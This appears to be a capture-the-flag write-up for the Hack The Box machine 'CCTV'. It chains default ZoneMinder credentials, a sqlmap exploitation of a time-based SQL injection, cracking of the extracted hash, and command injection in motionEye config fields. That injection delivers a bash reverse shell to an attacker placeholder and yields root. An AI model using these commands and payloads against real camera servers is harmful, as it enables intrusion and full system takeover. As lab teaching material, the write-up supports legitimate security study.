📸CCTV

https://app.hackthebox.com/machines/CCTV

HTB CCTV — Full Write-up

1) Recon

Nmap

nmap -sC -sV -oN nmap_initial.txt <TARGET_IP>

Open ports:

22/tcp SSH (OpenSSH 9.6p1 Ubuntu)
80/tcp HTTP (Apache 2.4.58)

Web app on /zm identified as ZoneMinder.

Added host entry:

echo '<TARGET_IP> cctv.htb' | sudo tee -a /etc/hosts

2) Initial Access to ZoneMinder

Default credentials worked on API login:

curl -s -X POST 'http://cctv.htb/zm/api/host/login.json' -d 'user=admin&pass=admin'

From API responses:

ZoneMinder version: 1.37.63
API version: 2.0

3) SQL Injection in ZoneMinder Request Endpoint(CVE-2024-51482)

Vulnerable endpoint:

/zm/index.php?view=request&request=event&action=removetag&tid=1

tid confirmed as time-based blind SQLi.

Working sqlmap extraction command:

sqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' \
  --cookie='ZMSESSID=<valid_session>' \
  --sql-query="SELECT Password FROM zm.Users WHERE Username='mark'" \
  --batch --time-sec=5

Extracted hash for mark:

$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.

Cracked with rockyou (hashcat -m 3200):

mark:opensesame

SSH login:

ssh mark@cctv.htb
# password: opensesame

sudo -l: no sudo rights.
Found second user home: /home/sa_mark (not accessible by mark).
No user.txt in /home/mark.

Local service discovery :

ss -lntup

From the full local listener list, an internal-only web service was identified:

127.0.0.1:8765 listening (localhost-only)

Service details:

motionEye 0.43.1b4
motioneye.service running as root
Motion control interface also local on 127.0.0.1:7999

/etc/systemd/system/motioneye.service:

[Service]
User=root
ExecStart=/usr/local/bin/meyectl startserver -c /etc/motioneye/motioneye.conf

5) motionEye Pivot → Root RCE

Why this worked

motionEye writes motion config values used by motion. The picture_filename / snapshot_filename fields were injectable and executed in shell context when triggering snapshot actions.

Trigger path used

Set payload through local motion control API (7999) and trigger snapshot:

# from attacker side with ssh command execution as mark, or directly on victim
curl "http://127.0.0.1:7999/1/config/set?picture_filename=$(python3 - <<'PY'
import urllib.parse
print(urllib.parse.quote("snap;bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1';#", safe=''))
PY
)"

curl "http://127.0.0.1:7999/1/config/set?snapshot_filename=$(python3 - <<'PY'
import urllib.parse
print(urllib.parse.quote("snap;bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1';#", safe=''))
PY
)"

curl "http://127.0.0.1:7999/1/action/snapshot"

Listener:

nc -lvnp 4444

Received shell as root@cctv.

6) Flags

From root execution context:

User flag (/home/sa_mark/user.txt):

73d1795546s8c5d987264ed19xf2d829

Root flag (/root/root.txt):

acabc64a13284a95946bf34hg9e3a9db

7) Attack Chain Summary

Enumerate web app (/zm) → identify ZoneMinder.
Abuse weak/default creds (admin:admin) for API access.
Extract DB creds via API.
Exploit SQLi on tid parameter to retrieve user hashes.
Crack mark hash (opensesame) and SSH as mark.
Enumerate internal-only services and find localhost motionEye (8765 + 7999).
Abuse command injection in picture_filename/snapshot_filename.
Trigger snapshot to execute payload as root.
Read both flags (sa_mark user flag + root flag).

Last updated 10 days ago

hashtagHTB CCTV — Full Write-up

hashtag1) Recon

hashtagNmap

hashtag2) Initial Access to ZoneMinder

hashtag3) SQL Injection in ZoneMinder Request Endpoint(CVE-2024-51482)

hashtag4) Post-Login Enumeration as mark

hashtag5) motionEye Pivot → Root RCE

hashtagWhy this worked

hashtagTrigger path used

hashtag6) Flags

hashtag7) Attack Chain Summary